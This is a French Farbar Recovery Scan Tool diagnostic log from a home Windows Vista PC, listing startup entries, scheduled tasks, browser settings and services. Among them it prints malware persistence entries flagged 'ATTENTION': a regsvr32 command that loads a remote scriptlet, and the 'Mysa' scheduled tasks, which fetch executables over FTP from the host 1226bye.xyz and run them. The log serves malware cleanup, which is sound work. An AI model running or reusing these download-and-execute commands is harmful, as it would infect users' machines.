Publicité
Publicité
Format du document : text/plain
Prévisualisation
Résultats d'analyse de Farbar Recovery Scan Tool (FRST) (x86) Version: 16-05-2019
Exécuté par françoise (administrateur) sur PC-DE-FRANÇOISE (Packard Bell BV IMEDIA A4730 FR) (17-05-2019 15:29:21)
Exécuté depuis C:\Users\françoise\Desktop
Profils chargés: françoise (Profils disponibles: françoise)
Platform: Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2 (X86) Langue: Français (France)
Internet Explorer Version 9 (Navigateur par défaut: "C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe" -- "%1")
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
() [Fichier non signé] C:\Program Files\PACKARD BELL\Packard Bell Recovery Management\Service\ETService.exe
(Adobe Systems, Incorporated -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
(AVAST Software s.r.o. -> AVAST Software) [Fichier non signé] C:\Program Files\AVAST Software\Avast Cleanup\TuneupSvc.exe
(AVAST Software s.r.o. -> AVAST Software) [Fichier non signé] C:\Program Files\AVAST Software\Avast Cleanup\TuneupUI.exe
(Avast Software s.r.o. -> AVAST Software) C:\Program Files\Avast Driver Updater\Avast Driver Updater.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\afwServ.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\aswidsagent.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Avast\wsc_proxy.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe
(AVAST Software s.r.o. -> AVAST Software) C:\Program Files\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe
(DEVGURU CO LTD -> DEVGURU Co., LTD.) C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe
(IBM -> IBM Corp.) [Fichier non signé] C:\Program Files\Trusteer\Rapport\bin\RapportMgmtService.exe
(IBM -> IBM Corp.) [Fichier non signé] C:\Program Files\Trusteer\Rapport\bin\RapportService.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\conime.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Piriform Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(TeamViewer -> TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
==================== Registre (Avec liste blanche) ===========================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKLM\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvLaunch.exe [242392 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1022152 2014-12-19] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [SSBkgdUpdate] => C:\Program Files\Common Files\Scansoft Shared\SSBkgdUpdate\SSBkgdupdate.exe [210472 2006-10-25] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM\...\Run: [OpwareSE4] => C:\Program Files\ScanSoft\OmniPageSE4\OpwareSE4.exe [79400 2007-02-04] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe [644696 2007-05-14] (Canon Inc. -> CANON INC.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [1603152 2007-04-03] (Canon Inc. -> CANON INC.)
HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [Google Update] => C:\Users\françoise\AppData\Local\Google\Update\1.3.34.11\GoogleUpdateCore.exe [410920 2019-05-15] (Google Inc -> Google LLC)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [orangeinside] => C:\Users\françoise\AppData\Roaming\Orange\OrangeInside\OrangeInside.exe [1797360 2019-03-25] (Orange -> Orange)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [13594584 2018-06-24] (Piriform Ltd -> Piriform Ltd)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [AvastBrowserAutoLaunch_F5C52D2961A6248B8567D8EC64132959] => C:\Program Files\AVAST Software\Browser\Application\AvastBrowser.exe [1027624 2018-06-13] (AVAST Software s.r.o. -> AVAST Software)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Run: [uTorrent] => C:\Users\françoise\AppData\Roaming\uTorrent\uTorrent.exe [1996008 2019-05-10] (BitTorrent Inc -> BitTorrent Inc.)
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Policies\system: [DisableLockWorkstation] 0
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Policies\system: [DisableChangePassword] 0
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\...\Policies\Explorer: [NoLogoff] 0
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Bubbles.scr [879616 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-18\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [13594584 2018-06-24] (Piriform Ltd -> Piriform Ltd)
HKLM\...\Drivers32: [VIDC.I420] => C:\Windows\system32\lvcodec2.dll [204800 2005-01-31] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
HKLM\...\Drivers32: [MSVideo] => C:\Windows\system32\vfwwdm32.dll [56832 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{30C521FB-255B-46C8-9F0D-EE5AE371C9AA}] -> C:\Program Files\AVAST Software\Browser\Application\49.0.79.76\Installer\chrmstp.exe [2018-06-26] (AVAST Software s.r.o. -> AVAST Software)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files\Google\Chrome\Application\49.0.2623.112\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
IFEO\malivebox.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
IFEO\softwareupdate.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
IFEO\uninstall.exe: [Debugger] "C:\Program Files\AVAST Software\Avast Cleanup\autoreactivator.exe"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Avast Cleanup Premium.lnk [2019-05-13]
ShortcutTarget: Avast Cleanup Premium.lnk -> C:\Program Files\AVAST Software\Avast Cleanup\TuneupUI.exe (AVAST Software s.r.o. -> AVAST Software) [Fichier non signé]
Startup: C:\Users\françoise\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes\Programs\Startup\Canon IJ Status Monitor Canon MP240 series Printer.lnk [2019-05-16]
ShortcutAndArgument: Canon IJ Status Monitor Canon MP240 series Printer.lnk -> C:\Windows\system32\rundll32.exe => C:\Users\FRANOI~1\CNMSSC~2.DLL,SMStarterEntryPoint LPT1:;Canon MP240 series Printer;cnmss Canon MP240 series Printer (Local).dll;Canon IJ Status Monitor Canon MP240 series Printer.lnk
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
==================== Tâches planifiées (Avec liste blanche) =============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
Task: {0B986567-D5A0-466D-90CE-C6EA17AF48CB} - System32\Tasks\{2ACEEE12-CA2E-4ED0-9ED9-F350864625FF} => C:\Windows\system32\pcalua.exe -a C:\Users\françoise\Music\emule_emule_0.50a_francais_10876.exe -d C:\Users\françoise\Music
Task: {23A05E22-719B-4639-8ED4-E50D1BF847F6} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
Task: {272B0EB1-5B65-4E2B-B920-5CD7BDE8AB1D} - System32\Tasks\DriverMaxAgent => C:\Program Files\Innovative Solutions\DriverMax\drivermax.exe
Task: {277A1958-55E6-4D01-9881-DCB9E67CC30A} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {2F2E331F-0C3D-474F-8FFC-68325E35CD6D} - System32\Tasks\Avast Driver Updater Startup => C:\Program Files\Avast Driver Updater\Avast Driver Updater.exe [30443544 2018-07-18] (Avast Software s.r.o. -> AVAST Software)
Task: {3222E643-169C-40EE-9A60-C34E4CD7F4E8} - System32\Tasks\DriverMaxWelcome => C:\Program Files\Innovative Solutions\DriverMax\drivermax.exe
Task: {346BEEC7-9FDD-454A-AFC5-D12954CCE041} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2762968 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
Task: {39BC81B2-D425-470C-830B-A2A3E0C91385} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-02-12] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {3E04B49A-6384-4D28-B49D-43D32A70311F} - System32\Tasks\Microsoft\Windows\orangeinside => C:\Users\françoise\AppData\Roaming\Orange\OrangeInside\OrangeInside.exe [1797360 2019-03-25] (Orange -> Orange)
Task: {5CE15FEB-54CD-4D3C-AE35-DE660545EEAA} - System32\Tasks\SafeZone scheduled Autoupdate 1458889759 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe
Task: {5E251469-0255-4DFC-A6DD-4636B300949C} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13594584 2018-06-24] (Piriform Ltd -> Piriform Ltd)
Task: {67D47C43-8EE6-48D8-B3B2-A2C82F6FB4AF} - System32\Tasks\Microsoft\Windows\orangeinstaller => C:\Program Files\Orange\Orange Installer\OrangeInstaller.exe [476760 2015-01-19] (Orange -> ) [Fichier non signé]
Task: {6BDADB0C-EA57-4C4F-B5EA-7E5102862C78} - System32\Tasks\NCH Software\ExpressZipSevenDays => C:\Program Files\NCH Software\ExpressZip\ExpressZip.exe
Task: {7D9D1F80-7C72-4799-A02F-0A9ED17916F4} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\system32\Macromed\Flash\FlashUtil32_32_0_0_192_pepper.exe [1452600 2019-05-15] (Adobe Inc. -> Adobe) [Fichier non signé]
Task: {873A6B77-CFA4-4905-B5CF-76A82D9C68BC} - \{817E9192-15EC-4FFE-A72F-DABBFC15959C} -> Pas de fichier <==== ATTENTION
Task: {8FDBF865-E536-48B6-AA6C-DC481CB90BDA} - System32\Tasks\DriverMax Notification => C:\Program Files\Innovative Solutions\DriverMax\drivermax.exe
Task: {97109F3F-5BA3-4BAD-82AE-2DB1B731736B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-10-23] (Google Inc -> Google Inc.)
Task: {9780B131-4D91-4780-954E-F2E4E95D39C6} - System32\Tasks\AvastUpdateTaskMachineUA => C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software) <==== ATTENTION
Task: {983A22A5-92DC-4D9A-9153-0968803E05FD} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-451813890-3602019613-3621138349-1000UA => C:\Users\françoise\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc -> Google Inc.)
Task: {A375B2A1-7F8C-414C-A964-DCEAF1E4836A} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Task: {A478E9B7-5E38-4215-9236-BE479ADFCFB2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [563000 2015-08-27] (Apple Inc. -> Apple Inc.)
Task: {A55847CA-AE49-4725-973E-FEDC55FDB08F} - System32\Tasks\AvastUpdateTaskMachineCore => C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software) <==== ATTENTION
Task: {A7F6ADB5-BB0C-4F4C-BBAA-94D94C56BA34} - \{64DCAE36-32A2-4828-8C48-07BD5794F957} -> Pas de fichier <==== ATTENTION
Task: {ADA0EF61-0724-4B9D-82E8-6609DDF5823F} - System32\Tasks\Avast Cleanup Update => C:\Program Files\AVAST Software\Avast Cleanup\TUNEUpdate.exe [1659000 2019-05-13] (AVAST Software s.r.o. -> AVAST Software) [Fichier non signé]
Task: {C20ECECA-8FFD-40B2-B461-D3A11445234E} - System32\Tasks\avastBCLRestartS-1-5-21-451813890-3602019613-3621138349-1000 => C:\Program Files\Mozilla Firefox\firefox.exe
Task: {C31A9A93-E78F-4F43-BB24-82C25C1EF5B5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-05-15] (Adobe Inc. -> Adobe) [Fichier non signé]
Task: {D0A78623-4791-415C-81EB-148368A041D4} - System32\Tasks\Application Starter - 8882161c434ab0fd43dca37f474f4351 => C:\Program Files\Innovative Solutions\DriverMax\innostp.exe
Task: {D16F6C4B-6464-4B3E-9FB5-03F581FB2830} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [153168 2018-10-23] (Google Inc -> Google Inc.)
Task: {D30B5003-7484-40B4-B904-E847C84CC77E} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-451813890-3602019613-3621138349-1000Core => C:\Users\françoise\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-28] (Google Inc -> Google Inc.)
Task: {EEB404EA-E9DE-4236-806D-30C4A1CD81FA} - System32\Tasks\{DBF0312E-896C-4AA5-82F7-0E48DBF36528} => C:\Windows\system32\pcalua.exe -a K:\InstallTomTomHOME.exe -d K:\
Task: {F5B03916-A23B-4EE0-916C-95E8D4B6B617} - System32\Tasks\maLivebox => C:\Program Files\Orange\ma Livebox\maLivebox.exe [146704 2017-02-07] (Orange -> Orange) [Fichier non signé]
Task: {FB629BE2-5125-4659-B018-D929EB96107E} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
Task: C:\Windows\Tasks\Avast Driver Updater Startup.job => C:\Program Files\Avast Driver Updater\Avast Driver Updater.exe
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{86398058-6e11-4b3f-8997-c7140cc09ad5} <==== ATTENTION (Restriction - IP)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704 2011-08-30] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{1BD299F8-4997-4407-95AD-7E5F67B163F7}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{76E74176-2E6B-4D36-B45C-00E50F93D500}: [DhcpNameServer] 192.168.1.1
HKLM\System\...\Parameters\PersistentRoutes: [0.0.0.0,0.0.0.0,192.168.1.1,1]
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.packardbell.com/rdr.aspx?b=ACPW&l=040c&s=1&o=vp32&d=1013&m=imedia_a4730_fr
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.packardbell.com/rdr.aspx?b=ACPW&l=040c&s=1&o=vp32&d=1013&m=imedia_a4730_fr
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com
HKU\S-1-5-21-451813890-3602019613-3621138349-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://r.orange.fr/r/Oodc_oi_odc?ref=O_OI_defaultPage_IEe32_wvistae32_odc
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-451813890-3602019613-3621138349-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Handler: ms-itss - {0A9007C0-4076-11D3-8789-0000F8105754} - c:\Program Files\Common Files\Microsoft Shared\Information Retrieval\msitss.dll [2007-06-08] (Microsoft Corporation -> Microsoft Corporation)
FireFox:
========
FF ProfilePath: C:\Users\françoise\AppData\Roaming\TomTom\HOME\Profiles\n1j5dpk5.default [2018-12-23]
FF NetworkProxy: TomTom\HOME\Profiles\n1j5dpk5.default -> type", 4
FF Extension: (Emulator) - C:\Users\françoise\AppData\Roaming\TomTom\HOME\Profiles\n1j5dpk5.default\Extensions\Navcore.9.510.1234792@tomtom.com [2017-12-10] [Legacy] [non signé]
FF ProfilePath: C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862 [2019-05-17]
FF Homepage: Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862 -> hxxps://r.orange.fr/r/Oodc_oi_odc?ref=O_OI_defaultPage_FFe32_wvistae32_odc
FF NewTab: Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862 -> hxxp://www.bing.com/?pc=COS2&ptag=D050219-A9FCDBB39EF&form=CONMHP&conlogo=CT3335799
FF Extension: (IBM Security Rapport) - C:\Users\françoise\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\rapportext@trusteer.com.xpi [2018-03-27] [UpdateUrl:hxxps://clients2.google.com/service/update2/crx]
FF Extension: (To Google Translate) - C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862\Extensions\jid1-93WyvpgvxzGATw@jetpack.xpi [2019-04-04]
FF Extension: (Avast Online Security) - C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862\Extensions\wrc@avast.com.xpi [2019-04-30]
FF SearchPlugin: C:\Users\françoise\AppData\Roaming\Mozilla\Firefox\Profiles\zjujpckz.default-1527222236862\searchplugins\bing-lavasoft-ff59.xml [2019-05-02]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2015-01-27] [Legacy] [non signé]
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [Fichier non signé]
FF Plugin: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files\Google\Picasa3\npPicasa3.dll [2014-08-13] (Google Inc -> Google, Inc.)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50906.0\npctrl.dll [2017-03-09] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [Pas de fichier]
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-16] (Google Inc -> Google LLC)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-16] (Google Inc -> Google LLC)
FF Plugin: @videolan.org/vlc,version=2.1.0 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN -> VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll [2015-09-24] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
Chrome:
=======
CHR Profile: C:\Users\françoise\AppData\Local\Google\Chrome\User Data\Default [2019-05-04]
CHR HKLM\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswwebrepchrome-sp.crx
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx
CHR HKLM\...\Chrome\Extension: [nladljmabboanhihfkjacnnkgjhnokhj] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-451813890-3602019613-3621138349-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof] - hxxps://clients2.google.com/service/update2/crx
==================== Services (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
S3 AdobeFlashPlayerUpdateSvc; C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2019-05-15] (Adobe Inc. -> Adobe) [Fichier non signé]
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6799632 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R2 Ati External Event Utility; C:\Windows\system32\Ati2evxx.exe [655360 2008-03-09] (Microsoft Windows Hardware Compatibility Publisher -> ATI Technologies Inc.)
S2 avast; C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [324000 2018-11-22] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [338632 2019-02-26] (AVAST Software s.r.o. -> AVAST Software)
S3 avastm; C:\Program Files\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [164984 2018-06-26] (AVAST Software s.r.o. -> AVAST Software)
R2 CleanupPSvc; C:\Program Files\AVAST Software\Avast Cleanup\TuneupSvc.exe [10227280 2019-04-16] (AVAST Software s.r.o. -> AVAST Software) [Fichier non signé]
S4 Dedicarz Service; C:\Program Files\Orange\ma Livebox\dedicarz\DedicarzService.exe [1970544 2014-09-15] (FRANCE TELECOM -> ) [Fichier non signé]
R2 ETService; C:\Program Files\Packard Bell\Packard Bell Recovery Management\Service\ETService.exe [24576 2008-07-16] () [Fichier non signé]
R2 ezSharedSvc; C:\Windows\System32\ezsvc7.dll [129992 2008-02-03] (EasyBits Software AS -> EasyBits Sofware AS) [Fichier non signé]
S3 FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [654848 2008-12-16] (Macrovision Europe Ltd.) [Fichier non signé]
S4 IJPLMSVC; C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE [101528 2007-04-13] (Canon Inc. -> ) [Fichier non signé]
S2 Orange update Core Service; C:\Program Files\Orange\OrangeUpdate\Service\OUCore.exe [1082016 2012-10-05] (FRANCE TELECOM -> France Telecom SA)
R2 RapportMgmtService; C:\Program Files\Trusteer\Rapport\bin\RapportMgmtService.exe [5243208 2018-03-11] (IBM -> IBM Corp.) [Fichier non signé]
S4 SkypeUpdate; C:\Program Files\Skype\Updater\Updater.exe [317400 2017-04-05] (Skype Software Sarl -> Skype Technologies) [Fichier non signé]
R2 ss_conn_service; C:\Program Files\Samsung\USB Drivers\25_escape\conn\ss_conn_service.exe [743688 2015-05-21] (DEVGURU CO LTD -> DEVGURU Co., LTD.)
S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [272952 2008-01-21] (Microsoft Windows -> Microsoft Corporation)
